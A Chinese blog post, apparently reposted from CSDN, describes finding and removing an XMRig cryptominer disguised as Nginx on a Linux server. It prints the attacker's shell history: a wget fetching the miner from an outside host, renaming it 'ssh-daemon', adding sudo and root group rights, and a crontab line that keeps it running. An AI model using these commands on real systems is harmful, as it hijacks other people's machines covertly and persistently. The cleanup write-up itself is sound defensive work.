刚开始访问ip地址出现503错误,进入服务器,我从来没操作过这么卡的linux服务器,查进程CPU占用情况
ps aux|head -1;ps aux|grep -v PID|sort -rn -k +3|head
刚开始 kill -9杀掉了,又重启emmmm
我想先把Nginx进程杀掉,然后发现压根没装
竟然伪装Nginx!!!
history查看历史命令
485 mkdir /opt
486 mkdir /opt/nginx-0.12
487 cd /opt
488 wget --no-check-certificate http://8upload.ir/uploads/f444102052.tar -O /opt/nginx-0.12.tar.gz
489 tar xvf /opt/nginx-0.12.tar.gz -C /opt/nginx-0.12
490 cd nginx-0.12
491 mv xmrig-2.8.3/xmrig ssh-daemon
492 mv xmrig-2.8.3/service service
493 chmod +x ssh-daemon
494 rm -rf config.json
495 crontab service
emmmm 我再copy一个大神的日志
yun install htop vim locate nano tmux git -y
apt-get intsall htop vim locate nano tmux git -y
git clone https://github.com/EVECloud/EVE_Miner_Tools
usermod -aG wheel cronjob
usermod -aG root cronjob
echo '%wheel' ALL=(ALL) ALL' >> 'etc/suduers'
mkdir /opt
cd /opt
git clone https://githu.com/lotus1314/xmrig nginx-0.12
cd nginx-0.12
mv xmrig ssh-daemon
chomd +x ssh-daemon
rm -rf config.json
nano config.json
cat <(crontab -l) <(echo '****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"') | crontab -
---------------------
作者:1990_super
来源:CSDN
原文:https://blog.csdn.net/runbat/article/details/84582397
版权声明:本文为博主原创文章,转载请附上博文链接!
首先是安装了一些挖矿需要的软件,然后写入到crontab 定时任务里,这时候我们需要做的是先把定时任务里的命令删除掉
使用crontab -e 命令编辑文件,
把****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"'
删掉
然后我保存不了,好在找到问题根源,不怕,我百度,写个正确表达式即可。
然后kill掉那个进程,在把它的文件文件夹都删了。